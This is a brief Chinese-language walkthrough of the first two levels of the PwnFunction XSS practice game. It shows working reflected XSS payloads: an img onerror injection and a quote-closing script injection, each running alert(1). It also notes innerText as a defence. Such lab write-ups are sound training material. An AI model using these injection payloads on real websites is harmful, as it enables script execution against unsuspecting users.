xss高级靶场

一、环境

XSS Game - Ma Spaghet! | PwnFunction

二、开始闯关

第一关

看看代码

试一下直接写

明显进来了为什么不执行看看官方文档吧

你不执行那我就更改单标签去使用呗

复制代码
?somebody=<img%20src=1%20onerror="alert(1)">

防御:

innerText

第二关

看看源码:

考察一个基础的闭合

复制代码
?jeff=1";alert(1)//

后续待更新

相关推荐
gnip10 分钟前
项目开发流程之技术调用流程
前端·javascript
转转技术团队23 分钟前
多代理混战?用 PAC(Proxy Auto-Config) 优雅切换代理场景
前端·后端·面试
南囝coding25 分钟前
这几个 Vibe Coding 经验,真的建议学!
前端·后端
gnip38 分钟前
SSE技术介绍
前端·javascript
weixin_472339461 小时前
网络安全之XSS漏洞:原理、危害与防御实践
安全·web安全·xss
yinke小琪1 小时前
JavaScript DOM节点操作(增删改)常用方法
前端·javascript
枣把儿1 小时前
Vercel 收购 NuxtLabs!Nuxt UI Pro 即将免费!
前端·vue.js·nuxt.js
望获linux1 小时前
【Linux基础知识系列】第四十三篇 - 基础正则表达式与 grep/sed
linux·运维·服务器·开发语言·前端·操作系统·嵌入式软件
爱编程的喵1 小时前
从XMLHttpRequest到Fetch:前端异步请求的演进之路
前端·javascript
喜欢吃豆1 小时前
深入企业内部的MCP知识(三):FastMCP工具转换(Tool Transformation)全解析:从适配到增强的工具进化指南
java·前端·人工智能·大模型·github·mcp